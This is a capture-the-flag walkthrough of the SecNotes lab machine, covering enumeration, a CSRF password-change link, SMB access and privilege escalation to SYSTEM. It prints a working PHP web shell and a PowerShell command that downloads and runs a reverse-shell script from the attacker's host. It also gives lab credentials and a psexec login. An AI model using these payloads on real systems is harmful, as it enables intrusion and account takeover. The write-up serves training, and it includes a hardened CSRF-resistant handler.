SecNotes
As always, we start with the enumeration phase: scanning the target for open ports and identifying the services and versions behind them.
The following nmap command quickly scans the full port range and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.97 -oN allPorts
-sS: TCP SYN scan. It never completes the TCP handshake, so it is relatively unobtrusive, although it is still easily spotted by an IDS.
--min-rate 5000: nmap tries to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane timing template, the fastest one. On a lossy network it may miss ports; the --min-rate option is what really drives the speed here.
-Pn: skip host discovery and assume the host is online.
-n: no reverse DNS resolution.
-oN: save the scan result in normal format to a file, in this case allPorts.
Now that we know which ports are open (80, 445 and 8808), let's identify the services and versions running on them. The following command scans those ports more thoroughly and saves the result to a file:
nmap -sC -sV -p80,445,8808 10.10.10.97 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable version detection.
-oN: save the scan result in normal format to a file, in this case targeted.
If we take a look at the website on port 80, we'll see a login page with a sign-up option.
Let's create a new user named alfa8sa with the password alfa8sa, and then log in with it.
We'll see four options: create a new note, change our password, sign out, or contact the website owners. We can also see a message mentioning the tyler@secnotes.htb user, which gives us both a valid username (tyler) and the domain name secnotes.htb (add it to /etc/hosts).
Let's try to change our password to alfa9sa. Before hitting submit, set up BurpSuite and intercept the request.
Notice that the form does not ask for the current password and carries no anti-CSRF token. Let's also try changing the request method from POST to GET.
If the website still changes the password with a GET request, we can send that URL to the tyler user: if he visits it while logged in, his browser attaches his session cookie and his password will be changed to alfa9sa. Let's forward the request and check that it changed our own password first.
And we see that the password has been changed. Now we can send the following URL to tyler, so that if he opens it his password becomes alfa9sa.
http://secnotes.htb/change_pass.php?password=alfa9sa&confirm_password=alfa9sa&submit=submit
Let's press the Contact Us button and send the URL in the message.
Now, let's sign out and try to log in as the user tyler with the password alfa9sa.
After a short wait we should be able to log in.
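To make the failure above concrete, here is an added example (not the SecNotes source, which the page never shows) of a hypothetical change_pass.php written two ways: the shape that makes the link attack work, and a hardened version. Table and column names, the session layout and the token field name are assumptions.

```php
<?php
// Added example, not SecNotes' own code. Two hypothetical password-change handlers:
// the shape that makes a cross-site request work, and a hardened one.
// Table/column names and session keys are assumptions for illustration.
session_start();

// Vulnerable shape: $_REQUEST merges GET and POST, so a plain link works; there is
// no CSRF token and no current-password check, and the victim's browser attaches
// the session cookie to the link automatically.
function change_password_vulnerable(PDO $db): bool
{
    if (empty($_SESSION['username'])) {
        return false;
    }
    $new     = $_REQUEST['password'] ?? '';
    $confirm = $_REQUEST['confirm_password'] ?? '';
    if ($new === '' || $new !== $confirm) {
        return false;
    }
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE username = ?');
    return $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['username']]);
}

// Token for the form; call it when rendering the page and emit it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hardened: POST only, per-session token compared in constant time, and the current
// password must be re-supplied, so a request riding on the victim's session fails.
function change_password_hardened(PDO $db): bool
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        return false;
    }
    if (empty($_SESSION['username'])) {
        http_response_code(401);
        return false;
    }
    $token = $_POST['csrf_token'] ?? '';
    if (empty($_SESSION['csrf_token']) || !hash_equals($_SESSION['csrf_token'], $token)) {
        http_response_code(403);
        return false;
    }
    $current = $_POST['current_password'] ?? '';
    $new     = $_POST['password'] ?? '';
    $confirm = $_POST['confirm_password'] ?? '';
    if ($new === '' || $new !== $confirm) {
        return false;
    }
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ?');
    $stmt->execute([$_SESSION['username']]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($current, $hash)) {
        http_response_code(403);
        return false;
    }
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE username = ?');
    $ok = $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['username']]);
    // Rotate the token after a state-changing action.
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    return $ok;
}
```

Setting the session cookie with SameSite=Lax (or Strict) is a cheap extra layer: a link opened from the Contact Us page is a same-site navigation here, so it would not help on this box, but it stops the same trick launched from an attacker-controlled site.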
There are three notes. The one called New Site contains a share name and some credentials.
Let's try to access the share with them.
smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //secnotes.htb/new-site
-U: username and password separated by "%". The single quotes matter here, since the password contains characters such as ! and & that the shell would otherwise interpret.
There are two files, which look like the default files of an IIS website. We saw on the nmap scan that there was another web server on port 8808, so this share is probably the web root of that site.
We can try to upload a webshell to the share and then reach it from the browser on port 8808. First, create a new file called webshell.php with the following content.
Then upload it to the SMB share.
smb: > put webshell.php
Now we can execute commands by passing them in the cmd parameter of the following URL.
http://10.10.10.97:8808/webshell.php?cmd=whoami
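The page does not show the contents of webshell.php, so here is an added example of the minimal command shell the procedure above relies on (my illustration, not the author's file). It reads the cmd parameter, runs it and returns the output as plain text.

```php
<?php
// webshell.php: added example of a minimal command web shell, not the walkthrough's
// own file. Runs the value of the "cmd" parameter and returns its output, e.g.
//   /webshell.php?cmd=whoami
// It has no authentication: anyone who can reach port 8808 can run commands, so
// remove it once it has served its purpose.
$cmd = $_REQUEST['cmd'] ?? '';
if ($cmd === '') {
    exit; // browsed without a parameter: stay blank
}
header('Content-Type: text/plain');
// shell_exec returns the output as a string instead of streaming it, so we can
// report when a command produced nothing (a common sign it failed or was blocked).
// "2>&1" also works under cmd.exe on Windows, which is what IIS will spawn here.
$out = shell_exec($cmd . ' 2>&1');
echo ($out === null || $out === '') ? "(no output)\n" : $out;
```

If the first request returns nothing, check that PHP is actually handled on port 8808 (the response would be the raw source otherwise) and that the file landed in the directory the site serves.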
Time to get a reverse shell. First, copy the Invoke-PowerShellTcp.ps1 script from nishang to the current directory.
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
Then open it and append, at the end of the file, the line that calls the Invoke-PowerShellTcp function back to our IP and listener port. The script only defines the function; the appended call is what runs it when the file is loaded.
Now, serve the current directory over HTTP with python.
python -m http.server 80
Finally, let's set up a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: port to listen on.
If we now access the following URL, the machine will download Invoke-PowerShellTcp.ps1 from our HTTP server, execute it in memory with IEX, and send us a reverse shell as the tyler user (the browser takes care of URL-encoding the spaces and quotes). Then we can grab the user flag.
http://10.10.10.97:8808/webshell.php?cmd=powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"
If we take a look at tyler's desktop, we'll see a shortcut named bash.lnk, which suggests that the Windows Subsystem for Linux (WSL) is installed on the system.
dir \users\tyler\desktop
If we execute the whoami command through bash, we'll see that we are the root user. Note that this is root inside the WSL Linux environment, not the Windows Administrator, but the Linux side is still worth a look.
bash -c "whoami"
Let's see if the root flag is inside the /root directory.
bash -c "ls -la /root"
There is no flag, but there is a .bash_history file with some content. Let's see what's in it.
bash -c "cat /root/.bash_history"
It contains the Administrator credentials. Let's get a shell as the nt authority\system user with the psexec utility from impacket; it needs an account with local administrator rights and write access to the ADMIN$ share over port 445, which we saw open. Then all we have to do is reap the harvest and take the root flag.
impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97